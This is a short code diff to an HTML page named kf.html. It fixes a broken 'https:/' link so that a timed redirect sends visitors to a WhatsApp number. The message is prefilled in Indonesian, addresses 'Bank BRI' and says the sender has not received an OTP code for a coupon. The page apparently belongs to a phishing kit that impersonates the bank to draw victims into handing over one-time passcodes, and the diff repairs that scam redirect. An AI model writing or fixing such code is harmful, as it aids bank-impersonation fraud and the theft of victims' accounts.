--- a/kf.html
+++ b/kf.html
@@ -670,7 +670,7 @@ function getcs(){
    
 setTimeout(function(){  
     $("#process1").hide();   
-location.href='https:/wa.me/6283892793280?text=Hallo%20𝗕𝗮𝗻𝗸%20𝗕𝗥𝗜%0ASaya%20Belum%20Mendapat%20Kode%20OTP Kupon';
+location.href='https://wa.me/6283892793280?text=Hallo%20𝗕𝗮𝗻𝗸%20𝗕𝗥𝗜%0ASaya%20Belum%20Mendapat%20Kode%20OTP Kupon';
 
     }, 0);    
     
